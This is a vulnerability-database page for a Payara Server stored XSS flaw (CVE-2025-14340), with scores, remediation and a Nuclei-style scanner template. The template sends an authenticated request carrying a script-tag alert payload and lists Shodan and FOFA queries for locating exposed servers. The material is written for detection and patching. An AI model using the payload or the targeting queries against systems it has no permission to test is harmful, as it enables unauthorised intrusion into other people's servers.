/Vulnerability Library

Payara Server - Cross-Site Scripting

CVE-2025-14340
Verified

Description

Payara Server versions <4.1.2.191.54, <5.83.0, <6.34.0, and <7.2026.1 contain a stored XSS vulnerability caused by improper input sanitization in the REST Management Interface. This allows attackers to mislead administrators into changing the admin password via a URL payload; however, the exploit requires administrator interaction.

Severity

High

CVSS Score

9

Exploit Probability

1%

Published Date

April 7, 2026

Template Author

0x_akoko, 0xr2r

CVE-2025-14340.yaml
id: CVE-2025-14340

info:
  name: Payara Server - Cross-Site Scripting
  author: 0x_Akoko,0xr2r
  severity: high
  description: |
   Payara Server versions <4.1.2.191.54, <5.83.0, <6.34.0, and <7.2026.1 contain a stored XSS vulnerability caused by improper input sanitization in the REST Management Interface. This allows attackers to mislead administrators into changing the admin password via a URL payload; however, the exploit requires administrator interaction.
  impact: |
   Attackers can trick administrators into changing the admin password, potentially leading to full administrative control.
  remediation: |
   Update to version 4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1 or later.
  reference:
    - https://github.com/DeepSecurityResearch/CVE-2025-14340
    - https://www.payara.fish
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14340
  classification:
    cve-id: CVE-2025-14340
    epss-score: 0.0066
    epss-percentile: 0.71338
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cwe-id: CWE-79
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"Payara Server" port:4848
    fofa-query: title="Payara Server" && port="4848"
  tags: cve,cve2025,payara,xss,glassfish,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /common/index.jsf HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Payara Foundation", "Payara")'
          - 'contains(header, "badassfish")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /management/domain/version?%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ":" + password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'badassfish'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100911d9f14d906e1d19a5c4eb692f502b33fe71f422f024098b9dc798ae7319464022100b617b038dab5e93128c7487d2aa2306129e8b9132c4a88dd78d1ce4e21dbda9b:922c64590222798bb761d5b6d8e72950
9.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-14340
CWE ID:
cwe-79

References

https://github.com/DeepSecurityResearch/CVE-2025-14340https://www.payara.fishhttps://nvd.nist.gov/vuln/detail/CVE-2025-14340

Remediation Steps

Update to version 4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1 or later.